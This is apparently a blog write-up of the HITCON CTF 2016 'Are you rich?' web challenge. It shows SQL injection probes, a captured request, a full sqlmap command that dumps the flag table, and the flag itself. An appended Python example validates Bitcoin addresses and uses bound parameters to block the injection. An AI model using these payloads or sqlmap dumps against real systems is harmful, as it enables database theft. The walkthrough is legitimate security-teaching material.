
Monday, 10 October 2016

HITCON CTF 2016: Are you rich? (Web) Write-up


Descriptions:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which are non-related to the challenge have been removed
Solution:

1. The website has 2 functions: Get our bitcoin address and Verify payment.


2. Try to get our bitcoin address. It generates a Bitcoin address and goes on to verify it.


3. There is not enough money. I guess that after we get our bitcoin address, it may insert this address into the database and have Verify payment check it. I try SQL injection in the Address field.

4. ' or 1=1# --- Found more than 1 records?


5. ' or 1=2# --- does not have enough confirmed money?


6. Having confirmed that the address parameter is vulnerable to SQL injection, I use Burp Suite to capture the HTTP request and copy it to a text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

7. Using the SQLmap -r option to load the HTTP request from the text file, SQLmap verifies that this vulnerability is a time-based blind SQL injection. The final SQLmap command used to get the flag:

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

8. Wait several minutes to retrieve the flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
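
Seen from the application side, the Address field should never reach the query as SQL text. The following is an added example, not part of the original write-up or the challenge's code: it validates the address as Base58Check and binds it as a query parameter, returning the two messages seen above. The payments table, its columns, PRICE and all function names are assumptions, and SQLite stands in for the challenge's MySQL back end.

```python
import hashlib
import sqlite3

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
PRICE = 1  # assumed price, in whole coins

def b58check_encode(version: int, hash160: bytes) -> str:
    """Encode version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    raw = bytes([version]) + hash160
    raw += hashlib.sha256(hashlib.sha256(raw).digest()).digest()[:4]
    n, out = int.from_bytes(raw, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(raw) - len(raw.lstrip(b"\0"))) + out  # zero bytes -> '1'

def is_valid_address(addr: str) -> bool:
    """Allow-list: Base58 alphabet, 25 bytes, P2PKH/P2SH version, valid checksum."""
    if not 26 <= len(addr) <= 35 or any(c not in B58 for c in addr):
        return False
    n = 0
    for c in addr:
        n = n * 58 + B58.index(c)
    if n >> 200:  # decoded value does not fit in 25 bytes
        return False
    raw = n.to_bytes(25, "big")
    return raw[0] in (0x00, 0x05) and b58check_encode(raw[0], raw[1:21]) == addr

def find_rows(db, addr: str):
    # Bound parameter: the driver passes addr as data, never as SQL text.
    return db.execute("SELECT confirmed FROM payments WHERE address = ?", (addr,)).fetchall()

def verify_payment(db, addr: str) -> str:
    if not is_valid_address(addr):
        return "invalid address"  # rejected before any query runs
    rows = find_rows(db, addr)
    if len(rows) > 1:
        return "Found more than 1 records?"
    if not rows or rows[0][0] < PRICE:
        return "does not have enough confirmed money?"
    return "paid"

def make_db():
    """Constructed sample data (assumed schema): one unpaid and one paid address."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE payments (address TEXT, confirmed INTEGER)")
    unpaid = b58check_encode(0x00, bytes(range(1, 21)))
    paid = b58check_encode(0x00, bytes(range(21, 41)))
    db.executemany("INSERT INTO payments VALUES (?, ?)", [(unpaid, 0), (paid, 5)])
    return db, unpaid, paid
```

With this in place, both test strings from steps 4 and 5 fail validation, and even when passed straight to find_rows they match zero rows instead of changing the query's logic.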
